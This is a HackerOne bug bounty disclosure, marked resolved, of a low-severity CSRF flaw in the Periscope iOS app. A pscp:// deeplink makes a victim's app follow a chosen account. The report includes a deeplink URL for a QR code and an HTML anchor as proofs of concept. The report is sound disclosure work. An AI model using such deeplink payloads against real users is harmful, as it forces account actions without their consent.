Periscope iOS app CSRF in follow action due to deeplink
Low
Vulnerability Details
Summary
This issue is mainly in the Periscope iOS app against CSRF follow action using deeplink.
as the report #583987 the CSRF work on iOS app
POC 1
QR code to follow periscope profile
`pscp://user/periscopeco/follow
`
███████
POC2 by kunal94
```
<!DOCTYPE html>
<html>
<a href="pscp://user/<any user-id>/follow">CSRF DEMO</a>
</html>
```
video
█████████
## Impact
CSRF Follow against any user in periscope iOS app
Actions
View on HackerOneReport Stats
- Report ID: 805073
- State: Closed
- Substate: resolved
- Upvotes: 55